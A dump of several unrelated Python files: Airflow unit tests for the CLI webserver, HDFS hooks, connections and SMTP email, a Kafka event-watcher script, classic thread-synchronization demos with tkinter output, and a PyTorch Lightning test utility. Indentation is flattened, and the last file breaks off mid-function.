self.assertEqual(False, models.Variable.get('false', deserialize_json=True))
self.assertEqual(None, models.Variable.get('null', deserialize_json=True))
os.remove('variables1.json')
os.remove('variables2.json')
os.remove('variables3.json')
def _wait_pidfile(self, pidfile):
while True:
try:
with open(pidfile) as file:
return int(file.read())
except Exception:
sleep(1)
def test_cli_webserver_foreground(self):
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Patch for causing webserver timeout
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
# Shorten timeout so that this test doesn't take too long time
args = self.parser.parse_args(['webserver'])
with conf_vars({('webserver', 'web_server_master_timeout'): '10'}):
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
class FakeWebHDFSHook:
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient:
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': 'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': 'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': 'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': 'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862, 'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook:
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class ConnectionTest(unittest.TestCase):
def setUp(self):
utils.db.initdb()
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:password@ec2.compute.com:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:password@ec2.compute.com:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
class WebHDFSHookTest(unittest.TestCase):
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
HDFSHook = None
snakebite = None
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = 'hdfs://localhost:8020'
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
send_email_test = mock.Mock()
class EmailTest(unittest.TestCase):
def setUp(self):
configuration.conf.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
with conf_vars({('email', 'EMAIL_BACKEND'): 'tests.core.send_email_test'}):
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_charset='utf-8', mime_subtype='mixed')
self.assertFalse(mock_send_email.called)
class EmailSmtpTest(unittest.TestCase):
def setUp(self):
configuration.conf.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
filename = 'attachment; filename="' + os.path.basename(attachment.name) + '"'
self.assertEqual(filename, msg.get_payload()[-1].get('Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp_with_multibyte_content(self, mock_send_mime):
utils.email.send_email_smtp('to', 'subject', '🔥', mime_charset='utf-8')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
msg = call_args[2]
mimetext = MIMEText('🔥', 'mixed', 'utf-8')
self.assertEqual(mimetext.get_payload(), msg.get_payload()[0].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual('attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get('Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
configuration.conf.get('smtp', 'SMTP_USER'),
configuration.conf.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
with conf_vars({('smtp', 'SMTP_SSL'): 'True'}):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
with conf_vars({
('smtp', 'SMTP_USER'): None,
('smtp', 'SMTP_PASSWORD'): None,
}):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
workflow_util.py
|
import csv
import os
import time
import threading
from subprocess import Popen
from typing import Dict
from uuid import uuid1
import pandas as pd
import yaml
from notification_service.client import NotificationClient
from notification_service.base_notification import EventWatcher, BaseEvent
from kafka import KafkaProducer, KafkaAdminClient, KafkaConsumer
from kafka.admin import NewTopic
from typing import List
import sys
import getopt
import json
def init_kafka(bootstrap_servers, input_topic, output_topic):
admin_client = KafkaAdminClient(bootstrap_servers=bootstrap_servers)
topics = admin_client.list_topics()
if input_topic not in topics:
print("create input topic: "+input_topic)
admin_client.create_topics(
new_topics=[NewTopic(name=input_topic, num_partitions=1, replication_factor=1)])
if output_topic not in topics:
print("create output topic: "+output_topic)
admin_client.create_topics(
new_topics=[NewTopic(name=output_topic, num_partitions=1, replication_factor=1)])
def push_kafka(bootstrap_servers, input_filename, input_topic):
producer = KafkaProducer(
bootstrap_servers=bootstrap_servers,
value_serializer=lambda v: v.encode())
f = open(input_filename)
while True:
line = f.readline()
if not line:
break
line = line.strip()
producer.send(input_topic, value=line)
time.sleep(0.004)
time.sleep(10)
def listen_kafka(bootstrap_servers, output_filename, input_topic, output_topic):
consumer = KafkaConsumer(
input_topic,
bootstrap_servers=bootstrap_servers,
auto_offset_reset='earliest',
consumer_timeout_ms=1000
)
input_time = {}
for message in consumer:
input_time[int(message.value.decode().split(',')[0])
] = message.timestamp
print('received ' + str(len(input_time)) + ' messages from input topic.')
time.sleep(10)
consumer = KafkaConsumer(
output_topic,
bootstrap_servers=bootstrap_servers,
auto_offset_reset='earliest',
consumer_timeout_ms=1000
)
output_time = {}
output_label = {}
for message in consumer:
line = message.value.decode().strip()
uid = int(line.split(',')[0])
output_time[uid] = message.timestamp
output_label[uid] = int(json.loads(','.join(line.split(',')[1:])[
1:-1].replace('""', '"'))['data'][0])
print('received ' + str(len(output_time)) + ' messages from output topic.')
resultf = open(output_filename, 'w+')
for uid in input_time:
if uid not in output_label or uid not in output_time:
continue
resultf.writelines(['{},{},{},{}\n'.format(
uid, input_time[uid], output_time[uid], output_label[uid])])
print('kafka messages have been written to ' + output_filename)
def send_timed_event():
time.sleep(60 * 15)
notification_client = NotificationClient(
'127.0.0.1:50051', default_namespace="default")
notification_client.send_event(
BaseEvent(key='KafkaWatcher', value='model_registered'))
class KafkaWatcher(EventWatcher):
def __init__(self, bootstrap_servers, input_topic, output_topic):
super().__init__()
self.bootstrap_servers = bootstrap_servers
self.input_topic = input_topic
self.output_topic = output_topic
self.count = 0
self.t = threading.Thread(
target=send_timed_event, name='send_timed_event')
self.t.daemon = True
def process(self, events: List[BaseEvent]):
print("watcher event triggered " + str(self.count))
time.sleep(20)
if self.count == 0:
push_kafka(self.bootstrap_servers,
'/tcdata/predict0.csv', self.input_topic)
listen_kafka(self.bootstrap_servers, './result.csv',
self.input_topic, self.output_topic)
notification_client = NotificationClient(
'127.0.0.1:50051', default_namespace="default")
notification_client.send_event(
BaseEvent(key='train_job', value='start'))
self.t.start()
else:
push_kafka(self.bootstrap_servers,
'/tcdata/predict1.csv', self.input_topic)
listen_kafka(self.bootstrap_servers, './result.csv',
self.input_topic, self.output_topic)
sys.exit()
print("watcher event finished " + str(self.count))
self.count += 1
if __name__ == '__main__':
opts, args = getopt.getopt(
sys.argv[1:], "", ["input_topic=", "output_topic=", "server="])
mydict = dict(opts)
input_topic = mydict.get('--input_topic', '')
output_topic = mydict.get('--output_topic', '')
bootstrap_servers = mydict.get('--server', '')
bootstrap_servers = bootstrap_servers.split(',')
init_kafka(bootstrap_servers, input_topic, output_topic)
notification_client = NotificationClient(
'localhost:50051', default_namespace="default")
notification_client.start_listen_event(key='KafkaWatcher', event_type='UNDEFINED', namespace="default",
watcher=KafkaWatcher(
bootstrap_servers, input_topic, output_topic),
start_time=0)
|
processsynch.py
|
import threading
import random
import time
import concurrent.futures
import logging
import queue
from random import randint
from time import sleep
import tkinter as tk
import os
import queue
from multiprocessing import Process, Queue, cpu_count
# from tkinter import *
class ToolTip(object):
def __init__(self, widget):
self.widget = widget
self.tipwindow = None
self.id = None
self.x = self.y = 0
def showtip(self, text):
"Display text in tooltip window"
self.text = text
if self.tipwindow or not self.text:
return
x, y, cx, cy = self.widget.bbox("insert")
x = x + self.widget.winfo_rootx() + 57
y = y + cy + self.widget.winfo_rooty() +27
self.tipwindow = tw = tk.Toplevel(self.widget)
tw.wm_overrideredirect(1)
tw.wm_geometry("+%d+%d" % (x, y))
label = tk.Label(tw, text=self.text, justify=tk.LEFT,
background="#ffffe0", relief=tk.SOLID, borderwidth=1,
font=("tahoma", "8", "normal"))
label.pack(ipadx=1)
def hidetip(self):
tw = self.tipwindow
self.tipwindow = None
if tw:
tw.destroy()
def CreateToolTip(widget, text):
toolTip = ToolTip(widget)
def enter(event):
toolTip.showtip(text)
def leave(event):
toolTip.hidetip()
widget.bind('<Enter>', enter)
widget.bind('<Leave>', leave)
# Dining philosophers, 5 Phillies with 5 forks. Must have two forks to eat.
#
# Deadlock is avoided by never waiting for a fork while holding a fork (locked)
# Procedure is to do block while waiting to get first fork, and a nonblocking
# acquire of second fork. If failed to get second fork, release first fork,
# swap which fork is first and which is second and retry until getting both.
#
class Philosopher(threading.Thread):
running = True
def __init__(self, xname, forkOnLeft, forkOnRight):
threading.Thread.__init__(self)
self.name = xname
self.forkOnLeft = forkOnLeft
self.forkOnRight = forkOnRight
def run(self):
while(self.running):
# Philosopher is thinking (but really is sleeping).
time.sleep( random.uniform(1,2))
print ('%s is hungry.' % self.name, file=open("oplogs/dp.txt", "a"))
self.dine()
def dine(self):
fork1, fork2 = self.forkOnLeft, self.forkOnRight
while self.running:
fork1.acquire(True)
locked = fork2.acquire(False)
if locked: break
fork1.release()
print ('%s swaps forks' % self.name, file=open("oplogs/dp.txt", "a"))
# self.TBox.insert(tk.INSERT, '{} swaps forks'.format(self.name))
fork1, fork2 = fork2, fork1
else:
return
self.dining()
fork2.release()
fork1.release()
def dining(self):
print ('%s starts eating '% self.name, file=open("oplogs/dp.txt", "a"))
time.sleep(random.uniform(0,1))
print ('%s finishes eating and leaves to think.' % self.name, file=open("oplogs/dp.txt", "a"))
def dp():
def on_configure(event):
canvas.configure(scrollregion=canvas.bbox('all'))
root = tk.Tk()
root.title("Dining Philosophers")
canvas = tk.Canvas(root, height=600, width=400)
canvas.pack(side=tk.LEFT)
yscroll = tk.Scrollbar(root, command=canvas.yview)
yscroll.pack(side=tk.LEFT, fill='y')
canvas.configure(yscrollcommand = yscroll.set)
canvas.bind('<Configure>', on_configure)
frame = tk.Frame(canvas, background='white')
canvas.create_window((0,0), window=frame, anchor='nw')
f = open("oplogs/dp.txt", 'w')
f.close()
forks = [threading.Lock() for n in range(5)]
philosopherNames = ('Zeno','Seneca','Nietzsche','Aristotle', 'Buchanan')
philosophers= [Philosopher(philosopherNames[i], forks[i%5], forks[(i+1)%5]) for i in range(5)]
random.seed()
Philosopher.running = True
for p in philosophers: p.start()
time.sleep(3)
Philosopher.running = False
print ("Now we're finishing.", file=open("oplogs/dp.txt", "a"))
f = open("oplogs/dp.txt", 'r')
for line in f.readlines():
lbl = tk.Label(frame, text = line, background='white')
lbl.pack()
os.remove('oplogs/dp.txt')
root.mainloop()
#Use this to call Dining-Philosoper function
# dp()
class ReaderWriter():
def __init__(self):
self.rd = threading.Semaphore() #initializing semaphores using Semaphore class in
#threading module for reading and wrting
self.wrt = threading.Semaphore()
self.readCount = 0 #initializing number of reader present
def reader(self):
while True:
self.rd.acquire() #wait on read semaphore
self.readCount+=1 #increase count for reader by 1
if self.readCount == 1: #since reader is present, prevent writing on data
self.wrt.acquire() #wait on write semaphore
self.rd.release() #sinal on read semaphore
print ("Reader ",{self.readCount}," is reading")
self.rd.acquire() #wait on read semaphore
self.readCount-=1 #reading performed by reader hence decrementing readercount
if self.readCount == 0: #if no reader is present allow writer to write the data
self.wrt.release() # signal on write semphore, now writer can write
self.rd.release() #sinal on read semaphore
time.sleep(0.05)
def writer(self):
while True:
self.wrt.acquire() #wait on write semaphore
print("Wrting data.....") # write the data
print("-"*20)
self.wrt.release() #sinal on write semaphore
time.sleep(0.05)
def main(self):
# calling mutliple readers and writers
t1 = threading.Thread(target = self.reader)
t1.start()
t2 = threading.Thread(target = self.writer)
t2.start()
t3 = threading.Thread(target = self.reader)
t3.start()
t4 = threading.Thread(target = self.reader)
t4.start()
t6 = threading.Thread(target = self.writer)
t6.start()
t5 = threading.Thread(target = self.reader)
t5.start()
def rw():
c=ReaderWriter()
c.main()
#Use this to call Reader Writer
# rw()
def pc():
def producer(queue, event):
"""Pretend we're getting a number from the network."""
while not event.is_set():
message = random.randint(1, 101)
logging.info("Producer got message: %s", message)
queue.put(message)
logging.info("Producer received event. Exiting")
def consumer(queue, event):
"""Pretend we're saving a number in the database."""
while not event.is_set() or not queue.empty():
message = queue.get()
logging.info(
"Consumer storing message: %s (size=%d)", message, queue.qsize()
)
logging.info("Consumer received event. Exiting")
if __name__ == "__main__":
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO,
datefmt="%H:%M:%S")
pipeline = queue.Queue(maxsize=10)
event = threading.Event()
with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
executor.submit(producer, pipeline, event)
executor.submit(consumer, pipeline, event)
time.sleep(0.1)
logging.info("Main: about to set event")
event.set()
#Use this to call Producer Consumer
# pc()
def sb():
CUSTOMERS = 50
BARBERS = 3
WAITING_ROOM = 15
ARRIVAL_WAIT = 0.01
def wait():
time.sleep(ARRIVAL_WAIT * random.random())
class Barber(threading.Thread):
condition = threading.Condition()
customers = []
should_stop = threading.Event()
def run(self):
while self.should_stop.isSet() == False:
with self.condition:
if not self.customers:
# No customers, snore...
print("No Customers...", file=open("oplogs/sb.txt", "a"))
time.sleep(0.1 * random.random())
# Get the next customer
if self.customers:
current_customer = self.customers[0]
print("A new customer has sat down... ", file=open("oplogs/sb.txt", "a"))
# Actually service the next customer
if self.customers:
self.customers.pop(0)
current_customer.trim()
while current_customer.serviced.isSet() == False:
Customer().wait()
class Customer(threading.Thread):
WAIT = 0.05
def wait(self):
time.sleep(self.WAIT * random.random())
def trim(self): # Called from Barber thread
# Get a haircut
print("Cutting hair... ", file=open("oplogs/sb.txt", "a"))
time.sleep(0.1 * random.random())
print("Haircut finished ", file=open("oplogs/sb.txt", "a"))
self.serviced.set()
def run(self):
self.serviced = threading.Event()
# Grab the barbers' attention, add ourselves to the customers,
# and wait to be serviced
if len(Barber().customers) < WAITING_ROOM:
print("A new customer has entered... ", file=open("oplogs/sb.txt", "a"))
Barber().customers.append(self)
else:
print("Waiting room full, customer leaving... ", file=open("oplogs/sb.txt", "a"))
self.serviced.set()
while self.serviced.isSet() == False:
self.wait()
def sbstart():
barbers = []
def on_configure(event):
canvas.configure(scrollregion=canvas.bbox('all'))
root = tk.Tk()
root.title("Sleeping Barbers")
canvas = tk.Canvas(root, height=600, width=300)
canvas.pack(side=tk.LEFT, fill='both', expand=tk.TRUE)
yscroll = tk.Scrollbar(root, command=canvas.yview)
yscroll.pack(side=tk.LEFT, fill='y')
canvas.configure(yscrollcommand = yscroll.set)
canvas.bind('<Configure>', on_configure)
frame = tk.Frame(canvas, background='white')
canvas.create_window((0,0), window=frame, anchor='nw')
f = open("oplogs/sb.txt", 'w')
f.close()
print("Shop Opened", file=open("oplogs/sb.txt", "a"))
for i in range(BARBERS):
b = Barber()
barbers.append(b)
b.start()
all_customers = []
for c in range(CUSTOMERS):
wait()
c = Customer()
all_customers.append(c)
c.start()
for c in all_customers:
c.join() # Wait for all customers to leave
Barber().should_stop.set()
for b in barbers:
b.join() # Wait for the barbers to finish completely
print("All done for the day, Barber(s) leaving", file=open("oplogs/sb.txt", "a"))
f = open("oplogs/sb.txt", 'r')
for line in f.readlines():
lbl = tk.Label(frame, text = line, background='white')
lbl.pack()
os.remove('oplogs/sb.txt')
root.mainloop()
sbstart()
#Use this to call Sleeping Barber
# sb()
|
develop_utils.py
|
import os
import numpy as np
# from pl_examples import LightningTemplateModel
from pytorch_lightning import seed_everything
from pytorch_lightning.callbacks import ModelCheckpoint
from pytorch_lightning.loggers import TensorBoardLogger, TestTubeLogger
from tests import TEMP_PATH, RANDOM_PORTS, RANDOM_SEEDS
from tests.base.model_template import EvalModelTemplate
import functools
def assert_speed_parity_relative(pl_times, pt_times, max_diff: float = 0.1):
# assert speeds
diffs = np.asarray(pl_times) - np.asarray(pt_times)
# norm by vanila time
diffs = diffs / np.asarray(pt_times)
assert np.alltrue(diffs < max_diff), \
f"lightning {diffs} was slower than PT (threshold {max_diff})"
def assert_speed_parity_absolute(pl_times, pt_times, nb_epochs, max_diff: float = 0.6):
# assert speeds
diffs = np.asarray(pl_times) - np.asarray(pt_times)
# norm by vanila time
diffs = diffs / nb_epochs
assert np.alltrue(diffs < max_diff), \
f"lightning {diffs} was slower than PT (threshold {max_diff})"
def get_default_logger(save_dir, version=None):
# set up logger object without actually saving logs
logger = TensorBoardLogger(save_dir, name='lightning_logs', version=version)
return logger
def get_data_path(expt_logger, path_dir=None):
# some calls contain only experiment not complete logger
# each logger has to have these attributes
name, version = expt_logger.name, expt_logger.version
# only the test-tube experiment has such attribute
if isinstance(expt_logger, TestTubeLogger):
expt = expt_logger.experiment if hasattr(expt_logger, 'experiment') else expt_logger
return expt.get_data_path(name, version)
# the other experiments...
if not path_dir:
if hasattr(expt_logger, 'save_dir') and expt_logger.save_dir:
path_dir = expt_logger.save_dir
else:
path_dir = TEMP_PATH
